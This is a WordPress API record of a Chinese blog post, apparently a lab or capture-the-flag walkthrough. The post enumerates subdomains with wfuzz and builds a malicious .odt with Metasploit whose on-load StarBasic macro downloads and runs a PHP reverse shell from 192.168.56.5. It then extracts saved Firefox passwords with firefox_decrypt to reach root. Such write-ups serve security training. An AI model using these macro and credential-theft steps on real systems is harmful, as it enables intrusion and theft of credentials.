{"id":241,"date":"2024-04-24T22:29:50","date_gmt":"2024-04-24T14:29:50","guid":{"rendered":"http:\/\/xiyu12.top\/?p=241"},"modified":"2024-04-24T22:29:50","modified_gmt":"2024-04-24T14:29:50","slug":"quick5","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=241","title":{"rendered":"quick5"},"content":{"rendered":"\n

\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/p>\n\n\n\n

\u4f7f\u7528wfuzz \u6536\u96c6\u5b50\u57df\u540d<\/p>\n\n\n\n

\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/p>\n\n\n\n

.odt \u6587\u6863\u4e2d\u7684\u5b8f\u5229\u7528<\/a><\/p>\n\n\n\n

LibreOffice\u662f\u4e00\u6b3e\u66ff\u4ee3Microsoft Word\u3001Excel\u7b49\u7684\u5f00\u6e90\u529e\u516c\u8f6f\u4ef6\uff0c\u6709Calc\u3001Writer\u7b49\u591a\u79cd\u5e94\u7528\u7a0b\u5e8f\u3002\u652f\u6301\u7684\u6587\u4ef6\u6269\u5c55\u540d\u4e5f\u591a\u79cd\u591a\u6837\uff0c\u4f8b\u5982 .odf\u3001.odp\u3001odt (OpenDocument)\u3001.odb (OpenOffice Base) \u7b49\u3002<\/p>\n\n\n\n

Microsoft \u521b\u5efa\u4e86\u8bb8\u591a Office \u6587\u6863\u683c\u5f0f\uff0c\u4e3b\u8981\u6709\u4e24\u79cd\u7c7b\u578b\uff1aOLE \u683c\u5f0f<\/strong>\uff08\u5982 RTF\u3001DOC\u3001XLS\u3001PPT\uff09\u548cOffice Open XML (OOXML) \u683c\u5f0f<\/strong>\uff08\u5982 DOCX\u3001XLSX\u3001PPTX\uff09\u3002\u8fd9\u4e9b\u683c\u5f0f\u53ef\u80fd\u5305\u542b\u5b8f\uff0c\u4f7f\u5176\u6210\u4e3a\u7f51\u7edc\u9493\u9c7c\u548c\u6076\u610f\u8f6f\u4ef6\u7684\u76ee\u6807\u3002 OOXML \u6587\u4ef6\u7684\u7ed3\u6784\u4e3a zip \u5bb9\u5668\uff0c\u5141\u8bb8\u901a\u8fc7\u89e3\u538b\u7f29\u8fdb\u884c\u68c0\u67e5\uff0c\u663e\u793a\u6587\u4ef6\u548c\u6587\u4ef6\u5939\u5c42\u6b21\u7ed3\u6784\u4ee5\u53ca XML \u6587\u4ef6\u5185\u5bb9<\/p>\n\n\n\n

msfconsole     #\u4f7f\u7528msf \u751f\u6210\u4e00\u4e2a.odt \u7684\u6a21\u677f\u6587\u4ef6\nuse exploit\/multi\/misc\/openoffice_document_macro \nset payload generic\/shell_reverse_tcp \nrun #  \u4f1a\u63d0\u793a\u751f\u6210\u4e86\u4e00\u4e2a\u6587\u4ef6  \ncp \/xxx\/xx\/msf.odt  \/tmp\nunzip msf.odt\nvim  Basic\/Standard\/Module1.xml \nzip -r msf.odt *  #\u4fdd\u6301\u76ee\u5f55\u7ed3\u6784  \u538b\u7f29\u4e3a .odt \u6587\u4ef6\nunzip -l msf.odt  #\u67e5\u770b\u662f\u5426\u6709\u76ee\u5f55\u7ed3\u6784\ncat Basic\/Standard\/Module1.xml \n<?xml version=\"1.0\" encoding=\"UTF-8\"?>                  \n<!DOCTYPE script:module PUBLIC \"-\/\/OpenOffice.org\/\/DTD OfficeDocument 1.0\/\/EN\" \"module.dtd\">\n<script:module xmlns:script=\"http:\/\/openoffice.org\/2000\/script\" script:name=\"Module1\" \nscript:language=\"StarBasic\">REM  *****  BASIC  *****                                                                                                                  \nSub Onload                                              \nShell(\"wget 'http:\/\/192.168.56.5:8000\/htb.php -O \/tmp\/1.php' \")\n    Shell(\"php \/tmp\/1.php\")                                  \nEnd Sub                                                                                                   \n<\/script:module> \nnc -lvp 123<\/code><\/pre>\n\n\n\n
\u5c06msf.odt  \u4e0a\u4f20\u5230\u670d\u52a1\u5668   \u7b49\u5f85\u53cd\u5f39shell  <\/p>\n\n\n\n
\u83b7\u5f97shell<\/p>\n\n\n\n
\u4e09\u3001\u63d0\u6743<\/p>\n\n\n\n
\u4f7f\u7528firefox_decrypt<\/a><\/strong> \u7834\u89e3firefox\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u5bc6\u7801<\/p>\n\n\n\n
git clone https:\/\/github.com\/unode\/firefox_decrypt.git\ncd   firefox_decrypt\nfind . -name \"logins.json\"   #\u5728firefox  \u7684\u914d\u7f6e\u6587\u4ef6\u76ee\u5f55  \/firefox\/common\/.mozilla   \u4e0b\u9762\u5bfb\u627e \u4e00\u4e2a  login.json \u6587\u4ef6,\u5728\u6587\u4ef6\u6240\u5728\u76ee\u5f55,\u8fdb\u884c\u7834\u89e3\npython3 firefox_decrypt.py  ..\/firefox\/common\/.mozilla\/firefox\/ii990jpt.default\/<\/code><\/pre>\n\n\n\n
\u83b7\u5f97\u4e00\u4e2a\u5bc6\u7801 \u767b\u9646  root<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u3001\u4fe1\u606f\u6536\u96c6 \u4f7f\u7528wfuzz \u6536\u96c6\u5b50\u57df\u540d \u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9 .odt \u6587\u6863\u4e2d\u7684\u5b8f\u5229\u7528 LibreOffice\u662f\u4e00 […]<\/p>\n","protected":false},"author":1,"featured_media":30,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[12,98],"class_list":["post-241","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-target-aircraft","tag-odt","tag-wfuzz"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/241","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=241"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/241\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/media\/30"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=241"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=241"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=241"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}